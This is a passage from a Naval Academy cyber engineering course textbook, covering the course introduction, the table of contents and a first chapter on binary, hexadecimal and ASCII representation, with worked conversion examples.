EC310 Notes
Version 2015.1
Patrick Vincent and Agur Adams
Introduction
1. One Command Away from Catastrophe
In his book Worm, The First Digital World War (Atlantic Monthly Press, 2011), author Mark Bowden opines:
Most people, even well-educated people with formidable language skills, folks with more than a passing
knowledge of word-processing software and spreadsheets and dynamic graphical displays, people who spend
hours every day with their fingertips on keyboards, whose livelihoods and even leisure-time preferences
increasingly depend on fluency with a variety of software remain utterly clueless about how any of it works.
The innards of mainframes and operating systems and networks are considered not just unfathomable but
somehow unknowable, or even not worth knowing, in the way that many people are content to regard
electricity as voodoo.
What happens when such people, albeit well-intentioned and bright, use DOD computer networks? The answer: Such
individuals open their computers and networks to malicious attack. In November 2008, a Pentagon employee arrived for work,
parked his car, and noticed thumb drives on the pavement. Not wanting to see resources go to waste, he collected the thumb
drives and proceeded to plug one into his office computer, thereby spreading a damaging virus throughout the secure classified
network he had access to use. Millions of man-hours expended on making a network secure can be wasted by one careless
user in the face of a devious foe. Dr. Paul Vixie, an Internet pioneer and former Chairman of the American Registry for Internet
Numbers (ARIN) is famously quoted as saying:
These security problems have been here so long that the only way I’ve been able to function at all is by
learning to ignore them. Or else I would be in a constant state of panic, unable to think or act constructively.
We have been one command away from catastrophe for a long time now.
And of course adversaries are continuously attempting to breach the security of DOD computers and networks. In the CNO’s
view, the Navy’s information capabilities must evolve from a 20 th-century supporting function to a main battery of 21st-century
sea power. In this new vision for an information-centric Navy, information will be treated as a weapon across the full range of
military operations—on the sea, under the sea, on land, and in the air. The U.S. Navy, in the CNO’s words, “stands on the cusp
of a revolution comparable to the introduction of nuclear power into the Fleet.”
USNA has always adapted its academic program to satisfy the relevant needs of the Navy and Marine Corps. The curriculum
is continually adjusted in order to ensure that midshipmen are prepared academically for the current and emerging challenges
they will face as officers. Against the emerging cyber threat, USNA has deemed it urgent to tailor its program to meet the
specific needs of users in cyberspace. Thus, USNA endeavors to graduate officers with a common understanding of the
concepts, principles and applications of cyber security in order to ensure the protection and the availability of the Navy’s
information systems and networks. This understanding is provided by a two-course sequence: SI110 Introduction to Cyber
Security and EC310 Applications of Cyber Engineering.
“A cyber attack perpetrated by nation states or violent extremist
groups could be as destructive as the terrorist attack of 9/11. Such
a destructive cyber terrorist attack could paralyze the nation.”
Former Defense Secretary Leon E. Panetta, July 2012
i
“Cyber has escalated from an issue of moderate concern to one of the
most serious threats to our national security. We now live in a world
of weaponized bits and bytes, where an entire country can be disrupted
by the click of a mouse.”
Gen. Martin E. Dempsey, Chairman of the Joint Chiefs of Staff, January 2013
The United States is not adequately prepared for a serious cyberattack. In
terms of preparation for a cyberattack on a critical part of its network
infrastructure, the U.S. is at a three on a scale of one to ten.
Gen. Keith Alexander, Former Director of the National Security Agency, July 2012
You may be thinking to yourself: "I'm going to be a pilot (or a Marine, or a Submariner, etc.). I'm not going to be an Information
Warfare Officer. Why do I need to know this?" The simple answer: If you find yourself at a keyboard interfacing with a Navy
system, you are operating in the Navy's cyber domain. The trained and aware user is the first and most vital line of defense.
Any officer, in any warfare specialty, may find himself the critical link in his organization’s network security posture.
Are we trying to make every midshipman a cyber-security expert?
You WILL learn cyber!
No. Unfortunately, we cannot.
However, USNA can make every midshipman better educated to operate in a cyber warfare environment. The aim is not to
make every naval officer a cyber specialist; rather, the aim is to recognize and properly respond to the need that every member
of the Navy and Marine Corps be aware of the cyber threat and be enabled to operate in this environment.
The Navy requires a workforce that is able to continue warfighting operations while defending against cyber attacks. This
requires that every user have some level of knowledge. Without officers who understand the security of Navy information
systems, and the threats faced, it will be increasingly difficult to protect networks from the growing threats of criminal and
state-sponsored intrusions and disruptions. The average naval officer must be elevated to one that is informed and interested
in cyber warfare and, thus able to responsibly inhabit a networked environment. The goal is to infuse a baseline scientific and
academic cyber security education in all midshipmen in order to address the need for cyber capable unrestricted line officers
that understand the threats and vulnerabilities at a basic technical level.
So, while you will not leave this course as a cyber security expert, you will obtain the cohesive technical foundation necessary
to comprehend cyber topics as you encounter them in upper level courses, in your Professional Development activities, and in
the fleet.
ii
But isn't this training, and isn't USNA
supposed to be about education?
USNA must instill in its students this new awareness of cyber security, ever mindful of its status as a first-class undergraduate
institution. Thus, a proper balance must be maintained between theory and application.
Midshipmen at USNA are not trained specifically to operate in the air or under the sea. Instead, they are trained in the basics
of hard science to be applied to specific warfare fields. Likewise, a foundation must be provided for officers to operate in the
cyber domain. As more military officers find themselves engaged in fighting in cyberspace, they will increasingly need a
thorough understanding of the basic technical concepts that underlie battle in this domain. There exists a core of technical
academic material that can prepare officers to understand and operate in cyberspace. That core is provided in SI110 and EC310.
Thus, the mission of EC310 is to continue educating each midshipman about cyber infrastructure and systems, inherent cyber
vulnerabilities and threats, and appropriate defensive security procedures, thereby enabling them to make principled decisions
regarding the potential benefits, consequences, and risks from a proposed use of an information system in today’s cyber warfare
environment. EC310, as its own course, is separate and distinct from SI110, yet intended to be complementary so that it builds
upon the student’s existing body of technical knowledge while exposing new theory, principles, and information systems not
covered in SI110. It should be enjoyable and technically challenging, yet accessible to the entire student body regardless of
major.
2. EC310 Course Objectives
EC310 is not about memorization and regurgitation; rather, the goal is for students to leave the course with an understanding
of information systems at a depth sufficient to manipulate their operation in accordance with security principles. The successful
student will appreciate the decisions that weigh the cost of design complexity against the cost of security—engineering is often
a series of tradeoffs where security must be sacrificed in order to ensure functionality. A main theme which will be revisited
again and again is that trust is often an inherent assumption in system design, while security is an afterthought.
Upon completing this course, you should be able to:
1. Describe in depth the principles, mechanisms, and technologies of information systems’ hardware and software
in both computers and communications domains, and describe the development of typical exploits used against
vulnerabilities in information systems.
2. Identify action that can be taken to protect information systems’ hardware and software against potential exploits
in both computers and communications domains.
3. Trace the lifecycle of a program through development, compilation, and execution to explain the methodology
and ramifications of exploiting a process.
4. Discuss steps that should be taken to prevent a process from being exploited.
5. Describe the fundamental networking technologies and design principles behind internetworking and how these
can be exploited by malicious actors.
iii
6. Discuss steps that should be taken to prevent networks from being exploited and identify who or what is
responsible for performing these preventative actions and where or when they should be applied.
7. Describe, qualitatively and quantitatively, how underlying electromagnetic spectrum technology is implemented
in wireless communication and electronic warfare systems.
8. Evaluate the security and robustness of communications systems by determining which characteristics allow a
system to transmit sensitive information to an intended receiver across a noisy or vulnerable channel.
3. Note: This Course is Not Easy! Some courses at USNA are easy—you might find yourself in the occasional course that
you can sleep through, limit your studying to just a few hours the night before an exam, and have little difficulty achieving a
passing grade.
EC310 is not such a course.
To do well in EC310, you will need to stay engaged, do the homework, ask questions in class and seek extra instruction at the
first sign of trouble. And, for your own good, DO NOT FALL BEHIND!
4. Plan for the Course The course is divided into three parts. In Part I: The Host, you will examine specific threats against
an individual computer in isolation from a network. In Part II: The Network, you will gain an in-depth understanding of how
the Internet works today and how fragile its core infrastructure really is. Finally, in Part III: Wireless, you will gain an
appreciation for the unique security threats inherent when operating in a wireless environment.
iv
Contents
Introduction ............................................................................................................................................ i
Part I: The Host...................................................................................................................................... 1
Chapter 1: Number Systems ............................................................................................................... 3
Reading ........................................................................................................................................ 15
Problems ...................................................................................................................................... 15
Security Exercise 1....................................................................................................................... 17
Chapter 2: C Programs ..................................................................................................................... 27
Reading ........................................................................................................................................ 41
Problems ...................................................................................................................................... 41
Security Exercise 2....................................................................................................................... 43
Chapter 3: Assembly Language and Memory ................................................................................... 57
Problems ...................................................................................................................................... 79
Security Exercise 3....................................................................................................................... 85
Chapter 4: Arrays and Strings .......................................................................................................... 95
Problems .................................................................................................................................... 105
Security Exercise 4..................................................................................................................... 109
Chapter 5: Intro to Pointers ............................................................................................................ 115
Problems .................................................................................................................................... 123
Security Exercise 5..................................................................................................................... 125
Chapter 6: Functions and the Stack ................................................................................................ 135
Problems .................................................................................................................................... 149
Security Exercise 6..................................................................................................................... 153
Chapter 7: The Buffer Overflow ..................................................................................................... 163
Problems .................................................................................................................................... 173
Security Exercise 7..................................................................................................................... 179
Chapter 8: The Heap ...................................................................................................................... 187
Problems .................................................................................................................................... 195
Security Exercise 8..................................................................................................................... 197
Chapter 9: Privilege Management .................................................................................................. 203
Problems .................................................................................................................................... 217
Security Exercise 9..................................................................................................................... 221
Chapter 10: A Real Buffer Overflow .............................................................................................. 231
Problems .................................................................................................................................... 241
Security Exercise 10 ................................................................................................................... 243
Part II: The Network .......................................................................................................................... 251
Chapter 11: The TCP/IP Model ...................................................................................................... 253
Problems .................................................................................................................................... 269
Chapter 12: Ethernet ...................................................................................................................... 271
Problems .................................................................................................................................... 281
Security Exercise 12 ................................................................................................................... 283
Chapter 13: Internet Protocol ......................................................................................................... 291
Problems .................................................................................................................................... 305
Security Exercise 13 ................................................................................................................... 309
Chapter 14: Routing Part I.............................................................................................................. 317
Problems .................................................................................................................................... 333
Security Exercise 14 ................................................................................................................... 335
Chapter 15: Routing Part II ............................................................................................................ 349
Problems .................................................................................................................................... 361
Security Exercise 15 ................................................................................................................... 365
Chapter 16: The Man-In-The-Middle Attack .................................................................................. 375
v
Problems .................................................................................................................................... 385
Security Exercise 16 ................................................................................................................... 389
Chapter 17: Border Gateway Protocol ............................................................................................ 395
Problems .................................................................................................................................... 409
Security Exercise 17 ................................................................................................................... 411
Chapter 18: Border Gateway Protocol Routing ............................................................................... 421
Problems .................................................................................................................................... 431
Security Exercise 18 ................................................................................................................... 433
Part III: Wireless ................................................................................................................................ 439
Chapter 19: Communications Systems, EM Spectrum, and Signals ............................................... 441
Problems .................................................................................................................................... 447
Security Exercise 19 ................................................................................................................... 449
Chapter 20: Intro to Modulation .................................................................................................... 457
Problems .................................................................................................................................... 467
Security Exercise 20 ................................................................................................................... 471
Chapter 21: Analog to Digital Conversion ..................................................................................... 477
Problems .................................................................................................................................... 489
Chapter 22: Digital Modulation ..................................................................................................... 491
Problems .................................................................................................................................... 501
Security Exercise 22 ................................................................................................................... 503
Chapter 23: Power Gain and SNR ................................................................................................. 509
Problems .................................................................................................................................... 515
Security Exercise 23 ................................................................................................................... 517
Chapter 24: Antennas .................................................................................................................... 523
Problems .................................................................................................................................... 533
Chapter 25: Propagation ................................................................................................................ 537
Problems .................................................................................................................................... 547
Security Exercise 25 ................................................................................................................... 549
Chapter 26: Electronic Warfare ..................................................................................................... 553
Security Exercise 26 ................................................................................................................... 559
Appendices ........................................................................................................................................ 569
Basic Linux Commands ................................................................................................................. 571
The Linux File System ................................................................................................................... 573
Brief Primer on gdb ...................................................................................................................... 577
Performing Base Conversions on the T1-nSpire CAS Calculator .................................................... 583
Answers to Selected Problems ....................................................................................................... 589
Authorship Notes
The first two parts—The Host and The Network—were drafted for the creation of the Naval Academy course
EC310, Applications of Cyber Engineering, during the 2014 academic year. These two sections were substantially revised
during the 2015 and 2016 academic years.
The third part—Wireless—was largely adapted from an existing course titled EE302, Electronic Communication Systems and
Digital Communications. The task of selecting information from EE302 for placement in EC310 was accomplished by
Jennie Wood, Chris Anderson, Jessie Atwood, Currie Wooten, Ryan Kelly, John Roth, Justin Blanco, and Ryan Whitty. Of
special note, Chapter 25−drafted by Chris Anderson, Jesse Atwood, and Jennie Wood−consists of new material composed for
EC310. Additionally, Security Exercise 26, drafted by Jennie Wood and Chris Anderson, is new for EC310. The entire
Wireless section was extensively edited and refined by Rob Ives and John Roth in the Spring of the 2015 academic year.
Acknowledgements
The following faculty members reviewed the entire course and offered many helpful suggestions which greatly improved the
course: Justin Blanco, Rita Doerr, Nicholas Rosasco, Kevin Fairbanks, John Roth, Ryan Kelly, Dane Brown, Richard Kopka
and Jay Benson. Beth Haneke offered expert advice throughout the process and greatly assisted with editing, formatting, and
preparing the manuscript for print.
vi
Part I: The Host
First, we provide an in-depth understanding of how operating systems utilize high-speed memory. Armed
with this knowledge, we then describe the methodology of exploiting a process and we describe the tools
that can be used to mitigate exploits.
2
Chapter 1: Number Systems
Objectives:
(a) Discuss the role of the operating system in bridging the gap between hardware and user applications and services.
(b) Explain the relationship between secondary memory, main memory and the CPU.
(c) Explain the meaning of the terms byte, word and half-word.
(d) Convert between binary and decimal notation.
(e) Convert between hexadecimal and decimal notation.
(f) Convert between hexadecimal and binary notation.
(g) Evaluate how characters are stored using ASCII notation.
Let us begin by reviewing the basics of computer architecture, operating systems, and the binary and hexadecimal number
systems.
1. Basic Computer Architecture
1.1. Definition of a Computer.
computer is a device that:




We adopt a very general and expansive definition of a computer. For our purposes, a
Accepts input information from input devices.
Stores data in memory so that it can be processed.
Processes data (e.g., by performing arithmetic calculations and modifications). This processing of data is done by
the Central Processing Unit (CPU) according to instructions provided by the user.
Produces output (usually the results of the processing) which is delivered to output devices.
Computers can perform complex calculations, search through large amounts of data, and sort huge amounts of information.
We can also perform these tasks, but computers can perform them quicker and with greater accuracy. Computer systems
consist of hardware and software. The hardware consists of the actual electrical and mechanical components that make up a
computer system. The software consists of the instructions that tell a computer how to do a specific job.
1.2. Input and Output Devices. Let's briefly discuss the main components of a computer's hardware, referring to Figure 1.1
on the next page. The computer accepts data from input devices. Examples of input devices are the mouse, the keyboard and
the network interface card. The computer delivers data to output devices. Examples of output devices are the monitor (i.e.,
the screen), the printer and the network interface card (the network interface card is both an input and an output device).
3
Figure 1.1. Basic Computer Architecture
1.3. Memory Concepts. All of the devices that store data within a computer can only be in one of two states. For example,
data might be stored using switches. But an individual switch can only be open or closed—only two states are possible if
switches are used. Alternatively, data may be stored on an optical disc. But, the data stored at any specific point on an optical
disc is represented by either a dark spot or a light spot—only two states are possible if optical media are used. If, on the other
hand, data is stored using capacitors, any individual capacitor can be either charged or uncharged—only two states are possible.
If magnetic media are used to store data, the data stored at any point is represented either by a magnetic pole with "north" at
the top, or a magnetic pole with "south" at the top—only two states are possible.
Since data can only be represented as one of two states, we refer to one state as a “1” and the other as a “0.” This is a binary
scheme. Each individual 1 or 0 is referred to as a binary digit (bit). All data within a computer is stored as bits, which we can
think of as a series of 1's and 0's. A collection of 8 bits is referred to as a byte.
A collection of four bytes (32 bits) is referred to as a word.1 Two bytes is termed a half-word.
Bytes are grouped into even larger quantities as:
Kilobyte (KB)
Megabyte (MB)
Gigabyte (GB)
-
1024 bytes ( 210 bytes)
1,048,576 bytes ( 220 bytes)
1,073,741,824 bytes ( 230 bytes)
A collection of four bits is called a nibble. Ha
ha ha ha!!! That one always kills me!
The computer interprets the 1's and 0's as numbers, letters or other information according to a coding scheme. For example,
single characters such as individual letters are stored as bytes using a code called the ASCII (American Standard Code for
Information Interchange) code. Using ASCII, the letter A is stored as 01000001, the letter a is stored as 01100001, the
percent sign % is stored as 00100101, etc.
1 The number of bits in a word (and even the definition of the term word) is ambiguous. In x86 assembly language, a word is actually defined to be 16 bits.
Some sources define a word to be the size of the CPU's internal registers, while others define it as the memory bus width. In EC310 we state that a word is
32 bits since that is the definition used by the gdb debugger to be introduced later.
4
1.4. Main Memory. Main memory stores the data that we input, stores the instructions that will process the data, and stores
the results of calculations until those results are moved to a permanent location. Think of main memory as the computer's
"scratch paper", or as a “waiting room” for data to be held in before and after it is processed.
Main memory is also called RAM—random access memory. Main memory is volatile; all data in main memory is lost when
the power is turned off.
Main memory can be thought of as a list of numbered locations. The number that identifies a memory location is called the
address of the memory location. The computer stores data in a memory location, and then uses the address to retrieve the data
when needed. In most computers, each individual memory location within main memory holds one byte of data. We might
have four consecutive items—W, X, Y and Z—stored in four consecutive bytes as shown below.
If the computer needs to store in main memory a data item that cannot be stored as a single byte, several adjacent bytes will be
used to hold the item. The address of the first of the bytes is used as the address when referencing the data item. In the picture
shown below, we say that data items W, X, Y and Z are stored consecutively in memory. The size of the memory location
holding data item Y is three bytes. The address of the memory location holding data item Y is 23. Similarly, the address of
data item Z is 26, and it is stored in two bytes.
1.5. Secondary Memory. Secondary memory is more permanent memory that provides long-term storage for data before and
after a computer is used. Examples of secondary memory include:



A computer’s hard disk
A CD or DVD
Flash memory (such as a USB stick)
Data in secondary memory is stored in files. A file is a named collection of data.
Note that main and secondary memory serve different purposes. Main memory is very fast but is also very expensive. Main
memory is also volatile—all of the data in main memory is lost when you turn off your computer. Secondary memory is much
cheaper than main memory, but it is much slower (i.e., accessing data takes much longer). Secondary memory has the additional
advantage of being nonvolatile—you do not lose any data on your hard drive when you turn your computer off.
1.6. The Central Processing Unit (CPU). The CPU is the “brain” of the computer. The CPU circuitry executes the
instructions that process data. The CPU takes data and instructions from main memory, processes the data and instructions, and
then returns the results to main memory.
The CPU is only able to carry out a small set of very simple instructions. Complex tasks must be broken down into very
simple instructions taken from this set. The set of instructions a CPU is able to carry out is termed its instruction set. An
instruction in the instruction set tells the CPU to carry out a simple specific arithmetic, logical, control or memory access
operation. Sample CPU instructions include:
5



Add, subtract, multiply, divide
Move data from one memory location to another
Compare two numbers to see which is greater
A CPU might have 100 to perhaps a thousand instructions in its instruction set. These instructions are implemented as electronic
circuits on the microprocessor chip.
The CPU only interacts with main memory; it does not interact directly with secondary memory. Since the CPU only interacts
with main memory, any program that your computer is running must be in main memory.
1.7. Software. Software consists of the instructions that tell a computer how to do a specific job. Software specifies how the
computer is to accept data from a user and how this data is to be processed. More formally, software is the set of programs
used by a computer. So…what is a program?
A computer program is a set of detailed instructions for a computer to follow to produce a specific result. A program tells a
computer how to interact with a user, perform a task, process data, etc. When we give a computer a program to follow, we are
said to be running the program, whereas the computer is said to be executing the program.
The most important software is the operating system. The operating system is a program that is “in charge” of all other
programs used by the computer. The operating system controls the computer’s hardware and software resources, and allocates
these resources as necessary to accomplish the desired task. Think of the operating system as a traffic cop or an air traffic
controller directing and coordinating activities.
The operating system acts as an interface between the computer and the user. We “communicate” with a computer via the
operating system. For instance, if we want to run an application program, say MSWORD, we “tell” this to the Windows
operating system, and the operating system then executes the MSWORD program. Common operating systems include
Windows, UNIX, Linux and Apple’s OS X.
We previously mentioned that any program that your computer is running must be in main memory. When your computer is
turned off, nothing resides in main memory. When you turn your computer on, the operating system is automatically copied
from the hard drive into main memory. When you tell the operating system that you want to run MSWORD (by, for example,
clicking on the MSWORD icon), the operating system copies the MSWORD program from your hard drive to main memory.
You may wonder: Can computers think? The answer is: No! Thankfully, no! Keep in mind: Computers only do what
programmers tell them to do (via programs). Computers solve problems after the programmer has formulated a solution.
2. Review of Number Systems
All data in a computer is represented in binary. The pictures of your summer vacation stored on your hard drive—it’s all bits.
The YouTube video of the cat falling off the chair that you saw this morning—bits. Your Facebook page—bits. The tweet you
sent—bits. The email from your professor telling you to spend less time on vacation, browsing YouTube, updating your
Facebook page and sending tweets—that’s bits too. Everything is bits.
We humans think about numbers using the decimal number system because we have ten fingers. Computers have only two
fingers, and therefore use the binary number system. We need to be able to readily shift between the binary and decimal
number representations. For instance, a decimal number can be represented as a sum of powers of 10. The decimal number
1,234 can be depicted as:
1 2 3 4 = 1·103 + 2·102 + 3·101 + 4·100 = 1,23410
103 = 1000
position
(i.e., thousands position)
Thus, 1,23410
102= 100
position
(i.e., hundreds position)
101 = 10
position
(i.e., tens position)
= 1x103 + 2x102 + 3x101 + 4x100 = 1000 + 200 + 30 + 4
6
100= 1
position
(i.e., ones position)
2.1. Converting a Binary Number to a Decimal Number To convert a binary number to a decimal number, we simply
write the binary number as a sum of powers of 2. Following the example for decimal numbers, the binary number 1101 can
be depicted as:
1 1 0 1 = 1  23  1  22  0  21  1 20  1310
23 = 8
position
(i.e., eights position)
Thus, 11012
22 = 4
position
(i.e., fours position)
 1  23  1 22  0  21  1  20
21 = 2
position
(i.e., twos position)
20 = 1
position
(i.e., ones position)
 8  4  1  1310
As a second example, consider converting the binary number 1011 to a decimal number. We note that the rightmost position
is the one’s position and the bit value in this position is a 1. So, this rightmost bit has the decimal value of 1  20 . The next
position to the left is the two’s position, and the bit value in this position is also a 1. So, this next bit has the decimal value of
1  21 . The next position to the left is the four’s position, and the bit value in this position is a 0. So, this leftmost position bit
has the decimal value of 0·22. The leftmost position is the eight’s position, and the bit value in this position is a 1. So, this
leftmost bit has the decimal value of 1  23 . Thus:
10112
 1  23  0  22  1 21  1  20
 8  2  1  1110
Practice Problem 1.1
Express the binary number 110110 as a decimal number.
Solution:
Given a binary number, you can now convert it to the equivalent decimal number. We will now convert numbers in the other
direction: from decimal to binary.
An
Aside
Note that we do not cover the speedier method of converting from base 10 to base-2:
Repeated division by 2, forming the answer from the remainders at each step. In case you
do not recall this method, see:
https://www.youtube.com/watch?v=Q2UgMYwWiO4
We do not cover this method since it would take too long to explain why this method works
(an explanation/proof can be found in any discrete math textbook). The method that we do
present in the notes is more laborious to present, and more time-consuming to use, but
students have no difficulty in understanding why it works.
2.2. Converting a Decimal Number to a Binary Number
convert the decimal number x to binary:
We express the decimal number as a sum of powers of 2. To
Step 1.
Find the highest power of two less than or equal to x. The binary representation will have a one in this
position. Denote the value of this highest power of 2 as y.
Step 2.
Now subtract this power of two (y) from the decimal number (x), denoting the result as z:
z  x  y.
Step 3.
If z  0 , you are done. Otherwise, let x  z and return to Step 1 above.
7
For example, suppose we wanted to convert the decimal number 5 to binary. We first think to ourselves: “Self, what is the
largest power of 2 that is less than or equal to 5?” 22  4 is a power of 2 that is less than 5, but is it the largest? Obviously,
it is, since 23  8 . So, the largest power of 2 less than or equal to 5 is 22  4 , and thus the binary representation of 5 will have
a one in the 22  4 position:
1
__________________________
2 4
2
________________________
21  2
________________________
20  1
Note that we have added placeholders for the positions of all powers of 2 less than 22 . Our task now is to determine if these
positions should contain a one or a zero.
Subtracting 4 from our number 5 gives 5  4  1 . Thus, 1 is now the number we are working with. We again ask: What is the
largest power of 2 that is less than or equal to 1. The answer is 20  1 , so the binary representation of 5 will have a one in the
20  1 position:
1
__________________________
2 4
2
1
________________________
2 2
1
________________________
2 1
0
Now, subtracting 20  1 from the number we are working with (also 1) gives 0, so we are done. Filling in zeros in all remaining
positions (i.e., all positions that do not have a 1), we have our answer: The decimal number 5 in binary is:
1
__________________________
2 4
2
0
________________________
2 2
1
1
________________________
2 1
0
or, 510  101 2 .
Practice Problem 1.2
Convert the decimal number 148 to binary.
Solution:
8
The binary representations of the decimal digits 0 through 15 are shown below.
Decimal Number
0
1
2
3
4
5
6
7
Binary Number
0000
0001
0010
0011
0100
0101
0110
0111
Decimal Number
8
9
10
11
12
13
14
15
Binary Number
1000
1001
1010
1011
1100
1101
1110
1111
You may be wondering about the leading zeros in the table above. For example, the decimal number 5 is represented in the
table as the binary number 0101. We could have represented the binary equivalent of 5 as 101, 00101, 0000000101, or
with any other number of leading zeros. All answers are correct.
Sometimes, though, you will be given the size of a storage location. When you are given the size of the storage location,
include the leading zeros to show all bits in the storage location. For example, if told to represent decimal value 5 as an 8-bit
binary number (i.e., a byte), your answer should be 00000101.
2.3. The Hexadecimal Number System Why Hexadecimal? We often have to deal with large positive binary numbers.
For instance, consider that computers connect to the Internet using a Network Interface Card (NIC). Every NIC in the world
is assigned a unique 48-bit identifier as an Ethernet address. The intent is that no two NICs in the world will have the same
address. A sample Ethernet address might be:
000000000100011101011110011111111001001000110110
As another example, computer engineers must oftentimes look at the contents of a specific item in computer memory. You
might, for instance, have to look at a variable that is stored at address:
00000000000100101111111101111100
You would probably agree that these long binary strings are cumbersome to transcribe or to read off to a coworker. Even if
you have come to love the binary number system, you would still likely agree that these long strings are too much of a good
thing.
Fortunately, large binary numbers can be made much more compact—and hence easier to work with—if represented in base16, the so-called hexadecimal number system. You may wonder: Binary numbers would also be more compact if represented
in base-10—why not just convert them to decimal? The answer, as you will soon see, is that converting between binary and
hexadecimal is exceedingly easy—much easier than converting between binary and decimal.
The Hexadecimal (Base-16) Number System has 16 digits:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F
Note that the single hexadecimal symbol A is equivalent to the decimal number 10, the single symbol B is equivalent to the
decimal number 11, and so forth, with the symbol F being equivalent to the decimal number 15.
Just as with decimal notation or binary notation, we again write a number as a string of symbols, but now each symbol is one
of the 16 possible hexadecimal digits (0 through F). To interpret a hexadecimal number, we multiply each digit by the power
of 16 associated with that digit’s position.
For example, consider the hexadecimal number 1A9B. Indicating the values associated with the positions of the symbols, this
number is illustrated as:
1 A 9 B
163 = 4096
position
162 = 256
position
161 = 16
position
9
160 = 1
position
2.4. Converting a Hexadecimal Number to a Decimal Number. To convert a hexadecimal number to a decimal number,
write the hexadecimal number as a sum of powers of 16. For example, considering the hexadecimal number 1A9B above, we
convert this to decimal as:


   
 
1A9B = 1 163  A 162  9 161  B 160
= 4096 + 10(256) + 9(16) + 11(1) = 6811
Practice Problem 1.3
Express the hexadecimal number 3CB as a decimal number.
Solution:
2.5. Converting a Decimal Number to a Hexadecimal Number. To convert a decimal number to hexadecimal, you use an
approach similar to that used in converting a decimal number to binary. But, instead of finding the largest power of 2 less than
or equal to the decimal number, you find the largest power of 16 less than or equal to the given decimal number. You then
subtract the number of multiples of this largest power of 16 from the given number and repeat the process with the result of the
subtraction.
For example, to convert the decimal number 746 to hexadecimal, we proceed as follows: We first note that the powers of 16
are: 160  1 , 161  16 , 162  256 , 163  4096 ... and we note that the largest power of 16 less than or equal to 746 is
162  256 . So, when we convert 746 to hexadecimal, the result will have three hexadecimal digits:
_ _ _
162
position
161
position
160
position
We next determine how many “256's” are in 746. The answer is 2, since (256)(2) = 512 and (256)(3) = 768
2 _ _
162
position
161
position
160
position
Now, subtracting (256)(2) from our original decimal value 746 results in 234. We now repeat this process for the decimal
value of 234.
The largest power of 16 that is less than or equal to 234 is 16. How many 16’s are contained within 234? The answer is 14,
since (16)(14) = 224. Since 14 is the hexadecimal digit E, we have:
2
162
position
E
_
161
position
160
position
Now, subtracting (16)(14) from our decimal value 234 results in 10. We now repeat this process for the decimal value of 10.
This is easy… there are 10 one’s (i.e., ten 160 's) in 10…and 10 is the hexadecimal digit A, so we have:
10
2
162
position
E
A
161
position
160
position
So, the decimal number 746 = 2EA in hexadecimal.
Note that with hexadecimal notation, as with binary and decimal notation, we must be careful that the base is understood.
When we speak of the number “23”, do we mean the decimal number 23 (in base 10), or do we mean the hexadecimal number
23 (which happens to equal 35 in base 10)? If the base is not clear from the context, it can be made explicit by including the
base as a subscript as in: 2316  3510 .
Some texts use the prefix 0x to indicate that a number is hexadecimal. That is, instead of writing 2316 some texts will use the
notation 0x23. We will often follow this convention.
Practice Problem 1.4
Convert the decimal number 2576 to hexadecimal.
Solution.
2.6. Converting a Hexadecimal Number to a Binary Number. Engineers often have to convert between binary and
hexadecimal, but this is quite simple to do.
We can convert directly from hexadecimal notation to the equivalent binary representation by using the following procedure:


Convert each hexadecimal digit to a four digit binary number, independent of the other hexadecimal digits.
Concatenate the resulting four-bit binary numbers together.
For example, to convert the hexadecimal number 4DA9 to binary, we first convert each hexadecimal digit to a four-bit string:
4 = 0100
D = 1101
A = 1010
9 = 1001
and then concatenate the results: The resulting binary number is: 0100 1101 1010 1001. We can drop leading zeros
(from the leftmost quartet only!), giving us:
4DA9 = 100110110101001
Practice Problem 1.5
Convert the number 0x13F to binary.
Solution:
11
2.7. Converting a Binary Number to a Hexadecimal Number. Converting from binary to hexadecimal entails reversing the
procedure for converting from hexadecimal to binary. Specifically, we can convert from binary notation to the equivalent
hexadecimal representation by using the following procedure:



Starting at the right, collect the bits into groups of 4.
Convert each group of 4 bits into the equivalent hexadecimal digit.
Concatenate the resulting hexadecimal digits.
For example, to convert 110110101001 to hexadecimal, we collect the bits into groups of 4 starting at the right: 1101
1010 1001, and then we convert each collection of bits into a hexadecimal digit:
1101
D
1010
A
1001
9
Thus 110110101001 = DA9.
Practice Problem 1.6
Convert the binary number 110101001 to hexadecimal.
Solution:
Practice Problem 1.7
Suppose the first byte of a variable is stored at memory location numbered:
0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 0 1 1 1 1 1 0 0
We say that this memory location is the address of the variable. What is this variable’s address in hexadecimal notation?
Solution:
Again, the hexadecimal number system simply provides us with a more convenient means of conveying binary quantities.
Consider the preceding example: Instead of saying “The item is at address 00000000000100101111111101111100”,
we can say “The item is at address 0012FF7C.” In fact, for this course memory locations will always be 32-bit values
represented in hexadecimal.
Practice Problem 1.8
Memory addresses are 32-bit values represented in hexadecimal.
(a)
(b)
(c)
How many bytes are in a memory address?
How many words are in a memory address?
How many hexadecimal digits are in a memory address?
Solution:
So, now you should be comfortable going back and forth between binary, decimal and hex representations.
12
Remember: for any number, the representation in a given base can be determined by looking at the weights assigned to the
position of each digit in the number. The number 111 is equal to one hundred eleven if it is intended to be a base 10 number.
This same number—111—is equivalent to the base-10 value of seven if it is intended to be a binary number. This same
number—111—is equivalent to the base-10 value of two hundred seventy three if it is intended to be a hexadecimal number.
Practice Problem 1.9
The picture below shows nine consecutive memory locations in RAM. The address of the first location shown is 0x08048374
and locations are numbered sequentially. The values stored at each address are also shown in hexadecimal. For example,
memory address 0x08048374 holds the value 0x55.
(a) Fill in the memory addresses for the last four locations.
(b) How many bytes are stored at each individual memory address?
Solution:
(a)
(b)
3. Representation of Characters
Within a computer, positive integers are stored in four bytes by converting the integer to a binary number. 2 We now address
the representation of characters, such as letters of the alphabet, punctuation signs and other assorted symbols (e.g., $, %, etc.).
Characters are stored within the computer using the American Standard Code for Information Interchange code—the ASCII
code—shown in the table below.
Each ASCII symbol is shown with both its hexadecimal representation and its base-10 representation. Suppose we wanted to
know how the symbol for the question mark is stored internally within the computer. Scanning the table for the question mark,
we locate it at the bottom of the second column, and we note that its hexadecimal value is 3F. Converting this hexadecimal
value to binary, we conclude that the question mark is stored as 00111111.
Practice Problem 1.10
How is the letter t stored in memory?
Solution:
2
The right-most 31 bits are used. The leftmost bit is set to zero (indicating a positive integer).
13
Practice Problem 1.11
Consider again the picture shown in practice problem 1.9. Suppose you know that a character is stored at memory location
0x08048374. What is stored at this memory location?
Solution:
14
Reading
Read Appendix 1, Basic Linux Commands.
Problems
Problem 1.
Why do computers use binary?
Problem 2.
